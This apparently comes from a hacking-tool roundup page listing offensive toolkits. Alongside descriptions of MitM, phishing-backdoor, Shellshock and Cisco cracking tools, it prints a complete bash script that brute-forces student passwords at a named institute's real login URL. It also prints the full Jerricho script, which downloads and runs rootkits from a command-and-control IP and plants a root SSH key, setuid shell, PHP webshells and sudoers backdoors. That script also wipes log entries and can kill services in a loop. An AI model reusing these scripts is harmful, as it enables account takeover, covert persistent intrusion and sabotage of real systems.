* INSTALL.sh => “improved” netool toolkit “Installer (Ubuntu|Kali)”

“Scanning – Sniffing – Social Engeneering”

Netool: its a toolkit written using ‘bash, python, ruby’ that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. this toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet) also uses macchanger to decoy scans changing the mac address.

Rootsector: module allows you to automate some attacks over DNS_SPOOF + MitM(phishing – social engineering) using metasploit, apache2 and ettercap frameworks. like the generation of payloads,shellcode,backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage.

Recently was introduced “inurlbr” webscanner (by cleiton) that allow us to search SQL related bugs, using severeal search engines, also this framework can be used in conjunction with other frameworks like nmap, (using the flag –comand-vul)
Example: 

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27
-s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operative Systems Supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Features (Modules) :

"1-Show Local Connections"
  "2-Nmap Scanner menu"
        ->
        Ping target
        Show my Ip address
        See/change mac address
        change my PC hostname
        Scan Local network 
        Scan external lan for hosts
        Scan a list of targets (list.txt)          
        Scan remote host for vulns          
        Execute Nmap command
        Search for target geolocation
        ping of dead (DoS)
        Norse (cyber attacks map)
        nmap Nse vuln modules
        nmap Nse discovery modules
        <-
  "3-Open router config"       
  "4-Ip tracer whois"
  "5-firefox webcrawler addon"                           
  "6-Retrieve metadata"
        ->
        retrieve metadata from target website
        retrieve using a fake user-agent
        retrieve only certain file types
        <-
  "7-INURLBR.php (webcrawler)"
        -> 
        scanner inurlbr.php -> Advanced search with multiple engines, provided
        analysis enables to exploit GET/POST capturing emails/urls & internal
        custom validation for each target/url found. also the ability to use
        external frameworks in conjuction with the scanner like nmap,sqlmap,etc
        or simple the use of external scripts.
        <-
  "8-r00tsect0r automated exploits (phishing - social engeneering)"
        ->
        package.deb backdoor [Binary linux trojan]
        Backdooring EXE Files [Backdooring EXE Files]
        fakeupdate.exe [dns-spoof phishing backdoor]
        meterpreter powershell invocation payload [by ReL1K]
        host a file attack [dns_spoof+mitm-hosted file]
        clone website [dns-spoof phishing keylooger]
        Java.jar phishing [dns-spoof+java.jar+phishing]
        clone website [dns-spoof + java-applet]
        clone website [browser_autopwn phishing Iframe]
        Block network access [dns-spoof]
        Samsung TV DoS [Plasma TV DoS attack]
        RDP DoS attack [Dos attack against target RDP]
        website D0S flood [Dos attack using syn packets]
        firefox_xpi_bootstarpped_addon automated exploit
        PDF backdoor [insert a payload into a PDF file]
        Winrar backdoor (file spoofing)
        VBScript injection [embedded a payload into a world document]
        ".::[ normal payloads ]::."
        windows.exe payload
        mac osx payload
        linux payload
        java signed applet [multi-operative systems]
        android-meterpreter [android smartphone payload]
        webshell.php [webshell.php backdoor]
        generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
        Session hijacking [cookie hijacking]
        start a lisenner [multi-handler]
        <-
  "9-Config ettercap"         
  "10-Launch MitM"            
  "11-Show URLs visited"       
  "12-Sniff remote pics"
  "13-Sniff SSL passwords"      
  "14-Dns-Spoofing"
  "15-Share files on lan"   
  "16-DoS attack {local}"      
  "17-Compile etter.filters"    
  "18-execute ettercap filter"
  "19-Common user password profiler [cupp.py]"

  d. delete lock folders
  a. about netool
  u. check for updates
  c. config toolkit
 db. access database
  q. quit

Download :
opensource.tar.gz (20.1 MB)
opensource[kali].tar.gz (20.1 MB)
Our Post Before  | Source : http://sourceforge.net/projects/netoolsh/

What’s the script purpose?
To take advantage of security breaches in order to brute force a password from any user. This usually happens when using weak passwords like current system does, there are no login validation attemps and security is not the best at server side.

Experimental tool based on shell scripting for obtaining passwords by brute force from ISILNet system users

How it works?
Script will generate passwords and login attempts and won’t stop until getting a success one. In order to know what’s going on, server responses will be evaluated to know if login was success, failed or remote website is under maintenance. If this last one happens, process will wait for it until it gets available again before re-trying an attempt, this means you just need to run the script and leave it doing its job. Remember that breaking a password could take time and there are a total of 1000000 (one million) password combinations to test (which is not much, really). I’ll suggest to run the script during a whole weekend, for example. Your internet connection also counts to make this process faster, please be patient.

What do I need to make it work?
– Unix terminal or Cygwin with bash and wget installed.
– File might be in UNIX format and ANSI encoded.

How to make it work?
In order to start cracking a password:
+ Modify USER variable from configuration section including username from the victim.
+ Modify other variables only if you know what you are doing otherwise leave them by default.
+ Go to your terminal and run the following command: sh /path/to/isil.sh

Notes
Before doing anything, you MUST consider the following:
– The author does not take any responsibility of what you could do with this tool, use it at your own risk.
– The author has nothing against ISILNet system, this tool was only an experiment.
– Everything is working fine until today 18/02/2015. I point this out because if system modifies their security standards or a major change happen, script might not work and some analysis will be needed in order to make it work again.

Bash Script :

#!/bin/bash

##
# ISILNet Password Cracker Tool v1.0
#
# Author: Oscar Jara [oscar_e24@hotmail.com]
#
# READ THIS BEFORE DOING ANYTHING
#
# The author does not take any responsibility of what you could do with this tool, 
# use it at your own risk.
#
# FAQ
#
# What is ISILNet?
# --
# A private web system from ISIL (Instituto San Ignacio de Loyola) peruvian institute 
# which is used by students and professors.
# 
# What's the script purpose?
# --
# To take advantage of security breaches in order to brute force a password from any user.
# This usually happens when using weak passwords like current system does, there are no login 
# validation attemps and security is not the best at server side.
#
# How it works?
# --
# Script will generate passwords and login attempts and won't stop until getting a success one. 
# In order to know what's going on, server responses will be evaluated to know if login was success, 
# failed or remote website is under maintenance. If this last one happens, process will wait for it 
# until it gets available again before re-trying an attempt, this means you just need to run the script 
# and leave it doing its job. Remember that breaking a password could take time and there are a total of 
# 1000000 (one million) password combinations to test (which is not much, really). I'll suggest to run the 
# script during a whole weekend, for example. Your internet connection also counts to make this process faster, 
# please be patient.
#
# What do I need to make it work?
# --
# Unix terminal or Cygwin with bash and wget installed.
# File might be in UNIX format and ANSI encoded.
#
# How to make it work?
# --
# In order to start cracking a password...
# Modify USER variable from configuration section (see below) including username from the victim.
# Modify other variables only if you know what you are doing otherwise leave them by default.
# Go to your terminal and run the following command: sh /path/to/script.sh
#
# Enjoy.
##

##
# Modify shell property to match case insensitive patterns when looking for certain strings.
# This command is available since bash v2 only.
##
shopt -s nocasematch

##
# Configuration section
##
APP_NAME="ISILNet Password Cracker Tool"
APP_VERSION="1.0"
APP_AUTHOR="Oscar Jara"
APP_AUTHOR_EMAIL="oscar_e24@hotmail.com"

##
# Configuration section
# --
# > URL = Where the login requests are processed in remote website.
# > USER = Username that you wish to have its password (e.g. i012345).
##
URL="https://isilnet.isil.pe/login.asp"
USER="i012345"

##
# Configuration section
# --
# After analyzing remote website behavior in each context (success, fail or maintenance) 
# below variables will store the strings that can be always found in each server response.
# > SUCCESS_STR = This string will determine if a login was success.
# > FAILED_STR = This string will determine if a login was failed.
# > MAINTENANCE_STR = This string will determine if the remote website is under maintenance.
##
SUCCESS_STR="bienvenido a isilnet"
FAILED_STR="olvidaste tu clave"
MAINTENANCE_STR="estamos actualizando"

##
# Configuration section
# --
# > LOGIN_CMD = Command to perform a login attempt in remote website.
##
LOGIN_CMD="wget -qO- ${URL} --post-data form_user=${USER}&form_pwd="

## 
# Login attempts counter
##
c=0

##
# Find if server response contains a string (using wildcards) that matches any of predefined strings in 
# configuration constants (SUCCESS_STR, FAILED_STR and MAINTENANCE_STR). This function will determine if 
# the remote website is under maintenance or a success/failed login was done.
##
is_logged() {
	local o="$1"
	if [[ "$o" == *${SUCCESS_STR}* ]]; then
		return 0
	elif [[ "$o" == *${FAILED_STR}* ]]; then
		return 1
	elif [[ "$o" == *${MAINTENANCE_STR}* ]]; then
		echo -e "\n#~~~~~~~~~~~~~~#\n\nSe ha detectado que el sistema se encuentra en mantenimiento.\n\n#~~~~~~~~~~~~~~#\n"
		while [[ "$o" == *${MAINTENANCE_STR}* ]]; do
			echo "Esperando a que el sistema se restablezca antes de continuar..."
			# Check system status again
			o=$(${LOGIN_CMD}"$2")
		done
		echo -e "\n#~~~~~~~~~~~~~~#\n\nSe ha restablecido el sistema, el proceso continuara.\n\n#~~~~~~~~~~~~~~#\n"
		echo "Se procedera nuevamente a utilizar la clave: $2 en el intento #$c"
		# Do recursivity
		is_logged "$o" "$2"
	else
		# If we are at this point, possible reasons could be any of these:
		# > String doesn't match (odd behavior)
		# > Remote site not available (down or moved)
		# > Lost connection with host
		# > Network problem, check your internet connection
		echo -e "\n#~~~~~~~~~~~~~~#\n\nSe ha detectado una respuesta inesperada del sistema o existe un problema de conexion.\n\n#~~~~~~~~~~~~~~#\n"
		echo "Proceso terminado debido a un error."
		exit 1
	fi
}

##
# Generate passwords that will be used for brute forcing user account 
# until getting a success login in remote website.
# > Password pattern is: 6 dig. numeric [0-9] passwords
# > Possible combinations are: 1000000 (one million)
##
echo -e "#~~~~~~~~~~~~~~#\n\n${APP_NAME} v${APP_VERSION}\nBy ${APP_AUTHOR} [${APP_AUTHOR_EMAIL}]\n\n#~~~~~~~~~~~~~~#\n"
echo -e "Se analizara la clave del usuario: ${USER}\nLas peticiones se realizaran hacia: ${URL}\n\n#~~~~~~~~~~~~~~#\n"
echo -e "Generando todas las combinaciones de claves posibles...\n"
for p in {0..9}{0..9}{0..9}{0..9}{0..9}{0..9}; do 
	(( c++ ))
	echo "Se procedera a utilizar la clave $p en el intento #$c"
	# Perfom login attempt
	o=$(${LOGIN_CMD}"$p")	
	if is_logged "$o" "$p" -eq 0; then 
		echo -e "Intento [OK]\n\n#~~~~~~~~~~~~~~#\nHACKED!\n\nUsuario: ${USER}\nClave: $p\n\n#~~~~~~~~~~~~~~#\n"		
		# Save data in file, this will be located in the home folder 
		# from the user running the script and overrided when new data 
		# is found (be careful)
		f="data.txt"		
		echo -e "Se procedera a guardar los datos en el disco duro.\nGuardando..."
		echo "Usuario: ${USER}, Clave: $p" > "$f"
		echo -e "Datos guardados correctamente en el directorio 'home' como '$f'\n"
		break
	else 
		echo "Intento fallido."
	fi
done
echo "Proceso terminado."
exit 0

Download : Master.zip  | Clone Url
Source : https://github.com/jaraoscar

Bashslayer is A tool written in Python for exploiting the Shellshock vulnerability in bash.
This tool will inject a payload included in an environment variable into a User-Agent header via POST.
The tool will then try to establish a socket to the payload, or vice versa, depending on the type of payload.

Usage
==========

>>To attempt exploitation of a target-
    ./bslayer.py [target host] [payload]
    E.X ./bslayer.py http://localhost/cgi-bin/vuln nc_bind

>>To view available payloads-
    ./bslayer.py payloads

Example
===========

root@kali:~/bashslayer# ./bslayer.py http://localhost/cgi-bin/vuln nc_bind

_____________________________________________________________
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
      / |
     || |
     || |
     || |  BashSlayer v1.0
     || |  Written by Kory Findley (K0FIN)
     || |
     || |
     || |
     || |
     || |
   <======>
      ||
      ||
      ||  
     {:;}


Available Commands >> 
                      > ./bslayer.py [url] [payload]
                      > ./bslayer payloads

E.X   >> ./bslayer.py http://localhost/cgi-bin/file.sh bind
_____________________________________________________________
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    
[*]Bind shell payload sent.
[>]Socket Established. Press [ENTER] To Start Command Shell- 
------------------------------------------------------------
ID: uid=33(www-data) gid=33(www-data) groups=33(www-data)
------------------------------------------------------------

Download : Master.zip
Source : https://github.com/K0FIN

Cisc0wn – Cisco SNMP Script is a Cisco SNMP enumeration, brute force, config downloader and password cracking script.
Tested and designed to work against Cisco IOS Switches and Routers.
Change Version 1.7 – Syntax error causing bug when no enable secrets in config file corrected Version

Cisco SNMP enumeration, brute force, config downloader and password cracking script.

Features:
– Checks SNMP is enabled on the route
– Brute forces the SNMP Read Only and Read Write community strings (can edit which wordlist it uses in script header)
– Enumerates information such as IOS version, hostname, Arp table, Routing table, interface list and IP addresses using the RO or RW community string.
– If RW community was found it will then download the router config automatically.
– It then searches and displays any enable or telnet passwords in clear text.
– If it finds Cisco type 7 encoded enable or telnet passwords it will auto decode them.
– It will display the Enable secret type 5 password and attempt to crack the MD5. It uses John first with its built in wordlist for speed. If this fails it will try and full crack.

Requirements:
Metasploit http://www.metasploit.com
Tested on Backtrack 5 and Kali.

Download : Master.zip  | Clone Url
Source : https://github.com/nccgroup

Changelog 01.04.2015:
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)

Bash “ShellShock” Remote Code Execution

Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.
Updates Exploits 01.04.2015 :
+ phpMoAdmin Remote Code Execution (CVE-2015-2208)
+ LotusCMS Remote Code Execution (OSVDB-75095)
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)
+ TBA

There is no changelogs here, as that would be too much effort, just git commits. Exploits may be updated regularly for greater stability, reliability or stealthiness, so check them for updates regularly

Exploit for CVE-2015-2208, phpMoAdmin Unauthenticated Remote Code Execution
This is an exploit for the eval() injection vulnerability recently disclosed in the phpMoAdmin MongoDB frontend. Very quick and dirty exploit, written to test out some new ideas I had for writing more streamlined PHP RCE exploits, in this case, using the cookie to set the connectback host/port at runtime when doing a filedropper type thing. See the code for what I mean…

Usage :
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable phpMoAdmin script.

Exploit for OSVDB-75095, LotusCMS 3.0 Unauthenticated Remote Code Execution
This is an exploit for the eval() injection vulnerability found ages ago in LotusCMS. Very quick and dirty exploit, written to test out some new ideas I had for writing more streamlined PHP RCE exploits, in this case, using the cookie to set the connectback host/port at runtime when doing a filedropper type thing. I ended up storing the payload itself in a POST variable, as storing it in the cookie lead to some strange encoding issues. See the code for what I mean. The reason for writing this was to have a reliable “playground” in which to test ideas, and it is going to probably be an evolving piece of work.

Usage:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable LotusCMS installation.

Download : Master.zip  | Clone Url | Our Post Before
Source : https://github.com/XiphosResearch | http://www.xiphosresearch.com/

Jerricho is a simple bourne script that quickly drops several persistence mechanisms on a target Linux host. OS Support : Ubuntu, Centos, Debian, FreeBSD.

TODO:
– Add a web interface for managing the connections and running commands.
– Automatically pull down passwords from the local systems, store, and sort them accordingly.
– Add a function to check to see if the system is still infected / running the rootkit and backdoors and if not re-execute/re-infect the system.
– Aggregate sniffer logs
– Keeping track of hosts which are still accessible via rootkit
– add bin to sudoers
– clear up logs better (Could probably do a date check when we execute on the system and remove all log lines that are 5 seconds before and 15 seconds after)
– spider and revert sshd_config
– rootkit – specify multiple ports on cmdline
– add iptables -F to all init scripts.
– Change the timestamp of modified files

Usage :
+ You run it as root, it drops a bunch of backdoors in multiple places. This enabled us to easily retain access at regionals for almost all systems.

+ runs stuff out of “/dev/…” and “/dev/ ” (2 spaces) because hiding in plain sight is easy.

+ to run via msf session: sessions -c export HISTFILE=/dev/null; wget -q $C2_URL/scripts/jericho2.1.sh -O /dev/stdout | /bin/sh – && history -c

Must be change the URL :
C2 URL and c2 IPAddress

this creates several ways back in:
1) drops our kernel rootkit which hooks accept() — lets us back in via any listening port, hides processes, etc
2) adds a root ssh key
3) drops our modified trixd00rd (takes params from env vars) as ‘rsyslogd’
4) drops the rooty icmp backdoor as ‘udevd’
5) backdoors the ‘bin’ system account, adds it to sudoers
6) adds a setuid shell in “/dev/ /” for re-elevation from php/bin account if needed
7) drops a basic PHP shell in a couple of likely web roots (http://url/.src.php?e=uptime)
8) adds all likely webserver users to sudoers (www-data, apache, httpd)

Additional:
– removes all entries from who (removes & re-creates utmp file, we can be selective later)
– optionally installs root a crontab to clear iptables rules every 5m. (uncomment iptables stuff if needed)
– optionally runs a bash script that takes down all services every 10s (teams lose points, also currently disabled)
– adds a secondary pubkey location to sshd_config, sourcing keys from /etc/ssh/authorized_keys as well as the std %h/.ssh dirs.
– We actually had people unknowlingly remove the kernel backdoor through various upgrade and reboot activities, init script changes,etc, only for us to retain access using the web shell, re-elevate via the suid bin and reinstall.

Latest Released v-2.1 Code:

#!/bin/sh
# cmc / sapling
# installs rootkit & backdoors on debian/centos/pfsense bsd boxes

# root ssh key
SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKcAi3VkTNZOQsLiiPvE8gyThrLzD2w8g1aN4VArx8ksOfVteVRfDtjWVLgLpdbySjaIBXn4WeViqxf1TZ8fq5loN4tcHnFOvtBs30JQ1JktwXqwvZaHomqZGJeP0IHLK9rYsJZnHbyk4u2qgs/vpM3wkhX86ywpDzTo+xTEV+XPuCBP+e7QIDuBM20rXkHEroIssYDjSus9o3issH/u+iguGulJaW534mZ9YiC6ELoDKLpQ0wCgwEjLfg04Tz6L6mKBjkyq86wb5iDo0+5zrY5XKOJB5BiBsvAULBnA3to203ZaGrJWQP1CdPbpOINHkTekoWJt5W40LSD41pE86z"

### CHANGE ME ###
# urls for webserver where kits/backdoor binaries are hosted
# file names to grab 

C2_URL="http://172.25.58.142/"
C2_IP="172.25.58.142"

# fedora kit
FEDORA_KIT="fedx32.bin"
FEDORA64_KIT="fedx64.bin"
UBUNTU64_KIT="ubux64.bin"
UBUNTU_KIT="ubux32.bin"
BSD_KIT="hole.bin"
TRIXDOOR="trixd00rd-static-ubuntu"
ROOTY="rooty-release.x86"
ROOTYBSD="rootybsd.x64"

#################

ARCH=`uname -i`

do_backdoors() {
        echo "removing utmp.."
        rm -rf /var/run/utmp
        touch /var/run/utmp
        chmod 664 /var/run/utmp 
        echo "installing root ssh key!"
        chattr -i /root/.ssh/authorized*
        if [ ! -d "/root/.ssh" ]; then
            mkdir /root/.ssh
        fi
        echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys2
        echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys
        # add secondary key auth file, for when they inevitably remove /root/.ssh/
        echo $SHARED_PUBKEY >> /etc/ssh/authorized_keys
        echo 'AuthorizedKeysFile /etc/ssh/authorized_keys' >> /etc/ssh/sshd_config
        chattr +i /root/.ssh/authorized_keys*
        echo "dropping trixd00r.." 
        if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
        fi
        cd /dev/...
        wget -q $C2_URL$TRIXDOOR -O rsyslogd
        chmod +x rsyslogd
        env PATH=$PWD MANAGER=$C2_IP /usr/bin/nohup rsyslogd &
        echo "dropping rooty.."
        wget -q $C2_URL$ROOTY -O udevd
        chmod +x udevd
        env PATH=$PWD /usr/bin/nohup udevd &
        # uncomment below to do iptables crontab shenanigans
        # echo "adding 5m disable iptables crontab.."
        # echo "*/5 * * * * /sbin/iptables -F" | crontab -
        echo "backdoor bin account! pass=lol123"
        sed -i -e 's/bin:\*:/bin:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
        usermod -s /bin/sh bin
        echo 'bin ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers 
        echo 'www-data ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
        echo 'apache ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
        echo 'httpd ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
        groupadd admin
        # take care of logs, ie 'groupadd[31001]: new group: name=admin, GID=1005' in auth.log
        sed -ie "/groupadd/d" /var/log/auth.log /var/log/messages /var/log/secure
        # ubuntu automatically makes members of admin have sudo capabilities. 
        # lets give that as an option for root to web backdoors
        usermod -G admin -a bin
        usermod -G admin -a www-data
        usermod -G admin -a httpd
        usermod -G admin -a apache
        # take care of logs, ie 'usermod[31005]: add 'bin' to group 'admin'
        sed -ie "/usermod/d" /var/log/auth.log /var/log/messages /var/log/secure
        echo "setuid /bin/sh! for use with bin account"
        if [ ! -d "/dev/  " ]; then
            mkdir "/dev/  "
        fi
        cp /bin/sh "/dev/  /pwnd"
        chmod 777 "/dev/  /pwnd"
        chown root:root "/dev/  /pwnd"
        chmod u+s "/dev/  /pwnd"
        echo "clearing log entries with our IP.."
        sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
        sed -ie "/passwd/d" /var/log/auth.log /var/log/messages /var/log/secure
        sed -ie "/Accepted password for bin/d" /var/log/auth.log /var/log/messages /var/log/secure
        sed -ie "/Accepted password for root/d" /var/log/auth.log /var/log/messages /var/log/secure
        echo "dropping webshells.."
        echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
        chmod 777 /var/www/.src.php
        echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
        chmod 777 /var/www/html/.src.php
}

do_bsdbackdoors() {
        # this was a quick hack for the pfsense firewalls
        # uses netcat vs wget because wget isnt installed on pfsense
        # by default
        echo "installing root ssh key!"
        if [ ! -d "/root/.ssh" ]; then
            mkdir /root/.ssh
        fi
        echo $PUBKEY >> /root/.ssh/authorized_keys2
        echo $PUBKEY >> /root/.ssh/authorized_keys
        chattr +i /root/.ssh/authorized_keys*
        echo "dropping rooty via netcat.."
        # NOTE: must have listening netcat with 'cat rootybsd.bin|nc -l 1338' on c2 server.
        if [ ! -d "/dev/  " ]; then
            mkdir "/dev/  "
        fi
        cd "/dev/  "
        nc $C2_IP 1338 > udevd
        chmod +x udevd
        env PATH=$PWD /usr/bin/nohup udevd &
        echo "dropping webshells.."
        echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
        chmod 777 /var/www/.src.php
        echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
        chmod 777 /var/www/html/.src.php
}


do_centos_rootkit() {
	echo "Retrieving Fedora x86 kit..."
        if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
        fi
	cd /dev/...
	wget -q $C2_URL$FEDORA_KIT
	chmod +x `basename $FEDORA_KIT`
	./`basename $FEDORA_KIT`
}

do_centos64_rootkit() {
	echo "Retrieving Fedora x64 kit..."
        if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
        fi
	cd /dev/...
	wget -q $C2_URL$FEDORA64_KIT
	chmod +x `basename $FEDORA64_KIT`
	./`basename $FEDORA64_KIT`
}


do_freebsd64_rootkit() {
    echo "Installing BSD hole.bin.."
    cd /opt/
    # cmc: pfSense / BSD has no wget/curl
    # make sure we have a listening netcat
    # cat backdoor.bin | nc -v -l 13337
    nc $C2_URL 1337 > /opt/scorebotd
    # chmod 0755 `basename $BSD_KIT`
    # mv `basename $BSD_KIT` /opt/scorebotd
    chmod +x /opt/scorebotd
    nohup /opt/scorebotd &
}
do_ubuntu_rootkit() {
	echo "Retrieving ubuntu x86 kit..."
        if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
        fi
	cd /dev/...
	wget -q $C2_URL$UBUNTU_KIT
	chmod +x `basename $UBUNTU_KIT`
	./`basename $UBUNTU_KIT`
}


do_ubuntu64_rootkit() {
echo "Retrieving ubuntu x64 kit..."
    if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
    fi
    cd /dev/...
    wget -q $C2_URL$UBUNTU64_KIT
    chmod +x `basename $UBUNTU64_KIT`
    ./`basename $UBUNTU64_KIT`
}

goodbye_sla() {
    cat <<EOF > /usr/share/service.sh
#!/bin/bash
#UMAD?
while [ 0 ]
do
	service httpd stop
	service postfix stop
	service sendmail stop
	service mysql stop
	service webmin stop
        service named stop
        service bind stop
	killall -9 webmin.pl
	killall -9 apache2
        killall -9 httpd
        killall -9 named
	killall -9 mysqld_safe
	killall -9 mysqld
        sleep 10
done
EOF
chmod +x /usr/share/service.sh
nohup /usr/share/service.sh >/dev/null 2>&1 &
}

# 64bit fedora
if [ $ARCH = "x86_64" ] && [ -f "/etc/redhat-release" ]; then
	do_centos64_rootkit
	do_backdoors
fi

# 32bit fedora
if [ $ARCH != "x86_64" ] && [ -f "/etc/redhat-release" ]; then
	do_centos_rootkit
	do_backdoors
        #goodbye_sla
fi


# ubuntu/debian 64bit 
if [ $ARCH  = "x86_64" ] && [ -f "/etc/debian_version" ]; then
    do_ubuntu64_rootkit
    do_backdoors
    #goodbye_sla
fi

# ubuntu/debian 32bit (assumed if not 64, whatever)
if [ $ARCH != "x86_64" ] && [ -f "/etc/debian_version" ]; then
	do_ubuntu32_rootkit
	do_backdoors
	#goodbye_sla
fi


# freebsd
if [ `uname`  = 'FreeBSD' ]; then
	do_freebsd64_kit
	do_bsdbackdoors    
fi

Download : Master.zip  | Clone Url
Source : https://github.com/ketm768

winEnum is a tool for Extracts information to escalate privilege on windows platform.
linuxJuicer is a tool for Extracts information to escalate privilege on linux platform.
For What?
[+] It can extracts juicy information on windows platform during post exploitation phase.
[+] It helps to find out possible privilege escalation vectors.
Example Output winEnum :
1. Finding os details
2. Finding hostname
3. Finding exploited user name
4. All users on the system
5. Getting group membership, active sessions, account lock out policy
– 5.1. Display which group policies are applied and info about the OS if victim is the member of a domain:
6. Checking available network interfaces and routing table
7. routing table
8. Checking ARP cache table for all available interfaces
9. Checking active network connections
Example htmml output :

Example screen Capture wmic-Report .html – Just try it For your knowledge base :-)

Download :
WinEnum : Master.zip  | Clone URL
linuxJuicer : Master.zip  | Clone URL
Source : https://github.com/greyshell